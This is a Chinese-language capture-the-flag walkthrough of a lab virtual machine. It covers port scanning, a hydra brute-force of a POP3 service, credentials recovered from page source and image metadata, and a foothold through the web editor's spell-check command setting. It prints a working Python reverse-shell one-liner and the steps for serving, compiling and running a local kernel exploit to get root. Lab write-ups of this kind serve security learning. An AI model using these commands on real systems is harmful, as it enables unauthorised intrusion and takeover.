netdiscover -r 192.168.133.0找到靶机
nmap -p- 192.168.133.220扫描全端口,发现只有几个端口开放
访问80端口
根据他的提示去/sev-home/路径下,发现是登录的界面,但是并没有账号密码,只能回去继续看默认页面了
F12发现存在一个terminal.js文件,查看文件内容,是吧对应的密码进行html编码了,InvincibleHack3r这个就是对应的密码,然后根据上面的内容,用boris登陆
登陆成功之后,给了下一个提示,f12查看源代码,发现最底下的注释,提示了用户名
我们可以知道55006 55007其中一个有可能是pop3端口,使用nc连接55007端口,根据回显消息看到pop3的字样
接下来用haydra进行爆破,使用kali自带的密码字典(别问为什么,我也不知道,网上抄的。。。),命令如下
hydra -s 55007 -L uname.txt -P /usr/share/wordlists/fasttrack.txt -t 64 192.168.133.222 pop3
找到两个用户的账号密码了。
接下来利用得到的用户名密码登入系统
USER boris(通过该命令输入用户名boris)
PASS secret1! (使用该命令输入用户的密码。之后,我们从目标计算机收到了登陆成功的消息,说明已在目标系统上成功通过了身份验证)
LIST(用于显示目标系统上所有可用的电子邮件)
RETR ID_number (用来查看指定ID的电子邮件)
看到第二封邮件的时候发现给了提示
然后修改自己本地的HOSTS文件
用刚才邮件中提到的那个账号密码登陆,登进去之后下面显示有发送邮件提示,点进去看看
得知了用户名,接着爆破一波?拿到了用户名密码,登陆上去,在主页发现管理员用户名admin,密码不知道
继续点着看看,发现一个TXT文件
看到一个路径,看看下载下来是什么,一张jpg图片,作为一个多年的MISC狗第一反应就是看详细信息
发现base64的字符串,解码一下看看,结果为xWinter1995x!
可能这就是之前admin用户的密码??试了一下竟然对了~
进去之后发现在编辑的页面发现版本号,求助google了
然后发现一个貌似能执行命令的地方,先去编辑器处将默认的改为PSpellShell
然后返回之前执行命令那个地方
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.133.206",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
然后需要调用系统的拼写检查,从而让系统执行我们对应的命令
已经弹回shell了
查看当前权限和内核版本
在kali里面搜一波
目标机器里面没有gcc,先修改c文件,直接把里面的gcc修改成cc即可
补充一下:
cc是Unix的C编译器,全程为c compiler,而gcc为Linux的,全称为GNU compiler collection,是一个编译器集合,既可以编译c也可以编译c++.
用python的简单文件服务器,传到靶机上去
python -m SimpleHTTPServer 8999
然后编译执行一把梭
cc 37292.c -o exp
chmod 777 exp
./exp
直接去root家目录读flag
最后还有一个彩蛋,优秀
使用msf提权,简单写写,只是为了试试好不好使